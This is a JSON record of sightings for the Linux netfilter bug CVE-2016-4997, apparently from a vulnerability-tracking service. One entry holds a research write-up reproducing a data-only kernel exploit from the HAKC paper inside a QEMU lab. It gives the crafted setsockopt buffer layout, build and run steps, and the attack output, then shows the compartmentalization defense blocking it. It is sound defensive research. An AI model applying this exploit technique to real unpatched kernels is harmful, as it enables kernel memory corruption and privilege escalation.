{"vulnerability": "cve-2016-4997", "sightings": [{"uuid": "a4a7d61d-2844-4108-8222-ee49840a69f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "exploited", "source": "https://www.exploit-db.com/exploits/40435", "content": "", "creation_timestamp": "2016-09-27T00:00:00.000000Z"}, {"uuid": "1692f64c-2ddf-4f9b-8b68-a8b6fc0773d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:42.000000Z"}, {"uuid": "662ad1bc-e039-479e-a3fe-1fdd5d53d95e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "https://gist.github.com/haohao-brian/ff61d9166cdb4ce5464346d7c94fdf55", "content": "# CVE-2016-4997: Reproducing the PoC for the Paper's Attack Technique\n\n**Paper**: Preventing Kernel Hacks with HAKC (NDSS 2022)  \n**Branch**: `qing-paper-poc` (located in `/home/elice/HAKC/MTE-kernel`)  \n**Key files**:\n- `poc/CVE-2016-4997/poc_paper.c` \u2014 user-space PoC\n- `poc/CVE-2016-4997/paper_helper.c` \u2014 kernel module (the attack target)\n- `net/ipv4/netfilter/ip_tables.c` \u2014 contains the CVE vulnerability and the HAKC protection\n\n---\n\n## 1. Approach to Writing the PoC Based on the Paper\n\n### The Paper's Description of CVE-2016-4997 (pages 1\u20132)\n\nListing 1 of the paper shows a **data-only attack**:\n\n```c\nstatic void compat_release_entry(struct 
compat_ipt_entry *e) {\n    struct xt_entry_target *t;\n    struct xt_entry_match *ematch;\n    xt_ematch_foreach(ematch, e)\n        module_put(ematch->u.kernel.match->me);   // \u2190 attack target\n    t = compat_ipt_get_target(e);\n    module_put(t->u.kernel.target->me);\n}\n```\n\nThe attacker supplies a `target_offset` smaller than `sizeof(compat_ipt_entry)=112` (for example, 74), which triggers the following chain:\n\n1. In `check_compat_entry_size_and_hooks()`, `compat_ipt_get_target(e)` returns `e+74` (inside the ipt_ip header)\n2. `xt_request_find_target(\"\", 0)` finds the standard target and writes an 8-byte kernel pointer to `e+82`\n3. The pointer's two high bytes (`0xFF,0xFF`) land at `e+88/89`, overwriting `target_offset` with `0xFFFF`\n4. Because `num_entries=2` but there is only 1 valid entry (`j=1 != 2`), execution enters the error cleanup path\n5. `compat_release_entry()` iterates using the corrupted `target_offset=0xFFFF` and finds the fake `xt_entry_match` planted by the attacker\n6. 
`module_put(fake_match->me)` decrements the kernel integer chosen by the attacker (here, `paper_fake_module->refcnt`)\n\n### Key Properties of the Attack\n\n- **No memory-safety violation**: every access stays within legitimately allocated memory\n- **No CFI violation**: control flow always follows legitimate paths\n- **data-only**: it only reads and writes data and executes no injected code\n- **Arbitrary kernel integer decrement**: the attacker can decrement any kernel counter by 1 (the paper's example is the UID)\n\n### Correct Expected Result of a Successful Attack: setsockopt Returns EINVAL, Not a Panic\n\nThe attack described in the paper is **completely silent**. When it succeeds the kernel does not crash;\nsetsockopt returns EINVAL (`-1 / errno=22`) to the caller, but the integer has already been quietly decremented.\n\nThis is not a contradiction: EINVAL is a deliberate part of the exploit path:\n\n```\nAttacker sets num_entries=2 but supplies only 1 valid entry\n\u2192 translate_compat_table: j=1 \u2260 num_entries=2\n\u2192 goto out_unlock  (error cleanup path)\n\u2192 compat_release_entry() is called  \u2190 vulnerability trigger point\n\u2192 module_put(fake_match->me)  \u2190 integer decrement\n\u2192 translate_compat_table returns -EINVAL\n\u2192 setsockopt returns -1/EINVAL  \u2190 
the attacker does not care about this value at all\n```\n\nAll the attacker cares about is that **the kernel integer has been decremented**; the syscall's error return is an expected by-product.\nThis is also what makes this CVE dangerous: it triggers no crash or kernel warning,\ntraditional memory-safety defenses (KASAN) and CFI cannot detect it at all, and only HAKC's\ncompartmentalization can intercept the access before it happens.\n\n### PoC Design (`poc_paper.c`)\n\n```\ncompat_ipt_replace header (96 bytes):\n  name=\"filter\", num_entries=2, size=ENTRIES_SIZE, num_counters=1\n\nentry0 (starts at buf+96):\n  [  0.. 83] ipt_ip = all zeros (passes ip_checkentry)\n  [ 88.. 89] target_offset = 74  \u2190 CVE trigger point\n  [ 90.. 
91] next_offset   = 65535 (entry0 fills the entire entries region)\n  [112..127] fake xt_entry_match:\n               match_size = 65535 - 112 = 65423\n               u.kernel.match = HAKC-format address of paper_fake_match\n\nentry0 + 65535 (fake xt_entry_target):\n               u.kernel.target = HAKC-format address of paper_fake_match\n               (prevents a NULL-deref crash in the target cleanup path)\n```\n\n**Design notes**:\n- `ENTRIES_SIZE = 65535 + 128 = 65663` rather than 65535, so that `e+65535` falls inside the buffer and cleanup does not read out of bounds, hit NULL, and crash\n- The fake xt_entry_match uses the HAKC-format address of `paper_fake_match` (see the section below)\n\n---\n\n## 2. Environment Setup\n\n### 2.1 QEMU Configuration\n\nThe QEMU invocation is defined in `/home/elice/HAKC/MTE-kernel/poc/CVE-2016-4997/start-qemu.sh`:\n\n```bash\nqemu-system-aarch64 \\\n  -machine virt,mte=on,gic-version=3,virtualization=on \\\n  -m 4096 -cpu cortex-a710,pauth=on -smp 4 \\\n  -kernel /home/elice/HAKC/MTE-kernel/arch/arm64/boot/Image \\\n  -drive if=none,file=/home/elice/bullseye.img,id=vda,... \\\n  -append '... 
nokaslr' \\\n  -netdev user,...,hostfwd=tcp::2223-10.0.3.15:22 \\\n  -fsdev local,...,path=/home/elice/HAKC/MTE-kernel/shared,... \\\n  -device virtio-9p-pci,...,mount_tag=shared\n```\n\nSSH connection:\n```bash\nssh -i /home/elice/bullseye.id_rsa -p 2223 root@localhost\n```\n\nIf the VM is in rescue mode, first bring up networking through the serial socket:\n```bash\nprintf '\\r\\n' | socat - UNIX-CONNECT:/tmp/hakc-elice-serial.sock\n# after logging in\nmkdir -p /run/sshd && /usr/sbin/sshd\nip link set enp0s2 up && dhclient enp0s2\n```\n\n### 2.2 Shared Directory\n\nQEMU's 9p shared directory maps to `/home/elice/HAKC/MTE-kernel/shared/` (mounted as `/shared` inside the VM).\n\nMount it inside the VM:\n```bash\nmount -t 9p -o trans=virtio shared /shared\n```\n\n---\n\n## 3. Reproducing the Attack (Counter Decrements from 1000)\n\n### 3.1 Switch to the Attack Version\n\n```bash\ngit -C /home/elice/HAKC checkout 6d3e37ffd\n# i.e. \"qing-paper-poc: fix attack PoC \u2014 clean counter decrement, no crash\"\n```\n\n### 3.2 Build ip_tables.ko and paper_helper.ko\n\n```bash\ncd /home/elice/HAKC/MTE-kernel\n\n# ip_tables.ko (attack-version HAKC policy: access_tok includes GREEN_CLIQUE)\nmake CC=clang ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- \\\n     -j$(nproc) M=net/ipv4/netfilter modules\n\n# paper_helper.ko (vmalloc version, with GREEN MTE coloring)\nmake CC=clang ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- \\\n     -j$(nproc) M=poc/CVE-2016-4997 modules\n\n# copy to the shared directory\ncp net/ipv4/netfilter/ip_tables.ko shared/\ncp poc/CVE-2016-4997/paper_helper.ko shared/\n```\n\n### 3.3 Build poc_paper (User-Space PoC)\n\n```bash\naarch64-linux-gnu-gcc -O2 -static -o shared/poc_paper \\\n    
poc/CVE-2016-4997/poc_paper.c\n```\n\n### 3.4 Replace ip_tables.ko on the VM Disk\n\nBecause ip_tables is loaded automatically when the VM boots, the module on disk must be replaced:\n\n```bash\n# inside the VM (via SSH or serial)\ncp /shared/ip_tables.ko /lib/modules/5.10.24/kernel/net/ipv4/netfilter/ip_tables.ko\necho b > /proc/sysrq-trigger  # reboot\n```\n\nAfter the reboot (press Enter at the rescue prompt), load paper_helper:\n\n```bash\n# inside the VM\nmount -t 9p -o trans=virtio shared /shared\ninsmod /shared/paper_helper.ko\n```\n\n### 3.5 Run the Attack\n\n```bash\n# inside the VM\n/shared/poc_paper\n```\n\n**Expected output**:\n```\n[*] paper_fake_match kernel address : 0x05ff800011b19000\n[*] counter before attack           : 1000\n[*] Calling setsockopt(IPPROTO_IP, cmd=66) ...\n[*]   entry0: target_offset=74  next_offset=65535  num_entries=2\n[*]   fake match  at entries+112  u.kernel.match=0x05ff800011b19000\n[*]   fake target at entries+65535  u.kernel.target=0x05ff800011b19000\n[*] setsockopt returned -1 (errno=22: Invalid argument)\n[*] counter after attack            : 998\n\n[+] ATTACK SUCCEEDED\n    counter: 1000 \u2192 998  (decremented 2 time(s))\n    Both match and target cleanup paths called\n    module_put(paper_fake_match->me) \u2014 no HAKC block.\n```\n\n### 3.6 Result Analysis\n\n- **counter 1000\u2192998**: `compat_release_entry` successfully called `module_put(paper_fake_match->me)` twice (once on the match path and once on the target cleanup path)\n- **setsockopt returns EINVAL**: this is expected (`translate_compat_table` returns `-EINVAL` because `j=1 \u2260 num_entries=2`); the attack happens in the cleanup path\n- **The kernel does not 
crash**: this is exactly the key property of a data-only attack, since every memory access is legitimate\n\n---\n\n## 4. HAKC MTE Color Defense Mechanism\n\n### 4.1 Defense Approach\n\nThe paper's core claim: if packet filtering is isolated in its own HAKC compartment, ip_tables can access only memory belonging to its own compartment and cannot access objects belonging to paper_helper (a different compartment).\n\nIn the implementation, `check_hakc_data_access(address, access_tok)` performs:\n\n```\n1. addr_claque = upper_bit_claque(address) = bits[63:56]\n2. addr_color  = mte_get_mem_tag(canonical(address))   // MTE allocation tag\n3. obtain_cert = create_pac_context(addr_claque, HAKC_MASK_COLOR(addr_color))\n4. salt        = obtain_cert & access_tok\n5. if VALID_CLAQUE(addr_claque) && !salt:  BUG()        // cross-compartment access\n```\n\n### 4.2 Key Problems and Solutions\n\n#### Problem 1: Raw Kernel Addresses Make VALID_CLAQUE Fail\n\nFor a raw kernel address (`0xffff...`), bits[63:56] = `0xFF = 255`, but:\n```\nVALID_CLAQUE(255) = (255 > 0) && (255 < 255) = false\n```\n\u2192 the BUG() condition `VALID_CLAQUE && !salt` is never satisfied.\n\n**Solution**: `paper_helper` exposes a **HAKC-format address** through `/proc/paper_helper`, with bits[63:56] set to claque_id=5 (instead of 0xFF):\n\n```c\nunsigned long hakc_addr = (raw & ~CLAQUE_BIT_MASK_2) |\n                          ((unsigned long)5 << CLAQUE_START_2);\n// raw = 0xffff800011b19000 \u2192 hakc_addr = 0x05ff800011b19000\n```\n\nNow `upper_bit_claque(0x05ff...) 
= 5` and `VALID_CLAQUE(5) = true`.\n\n#### Problem 2: MTE Tags Cannot Be Set on Module BSS Memory\n\nModule BSS/data pages are mapped `MT_NORMAL` (not `MT_NORMAL_TAGGED`), and `mte_get_mem_tag()` contains a software guard:\n\n```c\nif (!virt_addr_valid(canon) && !is_vmalloc_addr(canon))\n    return 0xf0;  // SILVER_CLIQUE: returns early without executing ldg\n```\n\nModule addresses are in neither the linear map nor the vmalloc space \u2192 SILVER is returned directly.\n\n**Solution**: allocate `paper_fake_match` with `vzalloc()`; a vmalloc address passes the `is_vmalloc_addr()` check, so the `ldg` instruction is actually executed. Then call `hakc_color_address()` to set the GREEN MTE tag:\n\n```c\npaper_fake_match = vzalloc(sizeof(struct xt_match));\nhakc_color_address(paper_fake_match, GREEN_CLIQUE, sizeof(struct xt_match));\n```\n\n#### Problem 3: The ip_tables access_tok Includes GREEN_CLIQUE\n\nThe original design lets ip_tables access GREEN_CLIQUE (to avoid wrongly blocking legitimate pointers), so the attack is not blocked.\n\n**Solution**: remove GREEN_CLIQUE:\n\n```c\n// Attack version (no defense):\nHAKC_MODULE_CLAQUE(2, RED_CLIQUE,\n    HAKC_MASK_COLOR(SILVER_CLIQUE) | HAKC_MASK_COLOR(GREEN_CLIQUE));\n\n// Defense version:\nHAKC_MODULE_CLAQUE(2, RED_CLIQUE,\n    HAKC_MASK_COLOR(SILVER_CLIQUE));\n```\n\n### 4.3 Arithmetic Verification of the Defense\n\n```\npaper_fake_match attributes:\n  claque = 5 (bits[63:56] = 0x05)\n  color  = GREEN_CLIQUE (MTE tag = 0xF1)\n\ncheck_hakc_access() computation:\n  addr_claque  = 5\n  VALID_CLAQUE(5) = (5>0 && 5<255) = true \u2713\n  addr_color   = 
GREEN_CLIQUE (0xF1)\n  obtain_cert  = (5 << 16) | HAKC_MASK_COLOR(GREEN)\n               = (5 << 16) | 2 = 0x00050002\n  access_tok   = HAKC_CONTEXT(2, SILVER_MASK)\n               = (2 << 16) | 1 = 0x00020001\n  salt         = 0x00050002 & 0x00020001 = 0x00000000\n\n  VALID_CLAQUE(5) && !salt  \u2192  BUG()  \u2192  attack blocked\n```\n\n### 4.4 Summary of Changes\n\n| File | Change |\n|------|---------|\n| `poc/CVE-2016-4997/paper_helper.c` | `paper_fake_match` now allocated with `vzalloc()`; explicit call to `hakc_color_address(..., GREEN_CLIQUE, ...)`; `/proc/paper_helper` outputs the HAKC-format address (bits[63:56]=5) |\n| `net/ipv4/netfilter/ip_tables.c` | `HAKC_MASK_COLOR(GREEN_CLIQUE)` removed from `HAKC_MODULE_CLAQUE` |\n\n---\n\n## 5. Reproducing the Defense (HAKC Blocks the Attack)\n\n### 5.1 Switch to the Defense Version\n\n```bash\ngit -C /home/elice/HAKC checkout b82d492ec\n# i.e. \"qing-paper-poc: HAKC defense \u2014 restrict ip_tables access_tok to SILVER only\"\n```\n\n### 5.2 Build the Defense-Version ip_tables.ko\n\n```bash\ncd /home/elice/HAKC/MTE-kernel\nmake CC=clang ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- \\\n     -j$(nproc) M=net/ipv4/netfilter modules\ncp net/ipv4/netfilter/ip_tables.ko shared/\n```\n\n### 5.3 Replace the Module in the VM and Reboot\n\n```bash\n# inside the VM\ncp /shared/ip_tables.ko /lib/modules/5.10.24/kernel/net/ipv4/netfilter/ip_tables.ko\necho b > /proc/sysrq-trigger\n```\n\n### 5.4 Load paper_helper After the Reboot\n\n```bash\n# inside the VM (after pressing Enter at the rescue prompt to log in)\nmount -t 9p -o trans=virtio shared /shared\ninsmod /shared/paper_helper.ko\ncat /proc/paper_helper   # confirm COUNTER=1000\n```\n\n### 5.5 Run the Defense Test\n\n```bash\n# inside the 
VM\n/shared/poc_paper\n```\n\n**Expected behavior**: the SSH connection drops (kernel BUG() panic) and `poc_paper` prints no output.\n\n### 5.6 Confirm the Defense Worked\n\nAfter the reboot (press Enter at the rescue prompt), remount and check:\n\n```bash\nmount -t 9p -o trans=virtio shared /shared\ninsmod /shared/paper_helper.ko\ncat /proc/paper_helper\n```\n\n**Expected output**:\n```\nFAKE_MATCH_KADDR=05ff800011b19000\nCOUNTER=1000\n```\n\nThe counter **stays at 1000**, which means `module_put` was never executed and the attack was completely blocked.\n\n### 5.7 dmesg Analysis\n\n```bash\ndmesg | grep -A 5 \"HAKC ENFORCE\"\n```\n\n**Expected dmesg**:\n```\nHAKC ENFORCE DENY (color mismatch):\n  address=05ff800011b19000 color=GREEN_CLIQUE claque=5\n  access_tok=0000000000020001 (caller: check_hakc_data_access+0x88/0xa0)\n------------[ cut here ]------------\nkernel BUG at arch/arm64/kernel/hakc/hakc.c:535!\nInternal error: Oops - BUG: 0 [#1] PREEMPT SMP\n...\npc : check_hakc_access+0x124/0x128\n```\n\n---\n\n## 6. The Two Commits Explained\n\n| Commit | Hash | Description |\n|--------|------|------|\n| Attack version | `6d3e37ffd` | ip_tables access_tok includes GREEN \u2192 attack succeeds, counter decrements |\n| Defense version | `b82d492ec` | ip_tables access_tok includes only SILVER \u2192 BUG() fires, counter unchanged |\n\nThe two versions differ by a single line in `ip_tables.c`:\n```diff\n-HAKC_MODULE_CLAQUE(2, RED_CLIQUE, HAKC_MASK_COLOR(SILVER_CLIQUE) | HAKC_MASK_COLOR(GREEN_CLIQUE));\n+HAKC_MODULE_CLAQUE(2, RED_CLIQUE, HAKC_MASK_COLOR(SILVER_CLIQUE));\n```\n\n`paper_helper.c` and `poc_paper.c` 
are identical in both versions; the difference lies purely in **the ip_tables compartment access policy**.\n", "creation_timestamp": "2026-06-04T01:11:13.000000Z"}, {"uuid": "07a0aaad-bb61-48e3-8d35-0576ca810a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:09:48.000000Z"}, {"uuid": "ec485950-1d81-412b-bfe6-15bc29ec7909", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}]}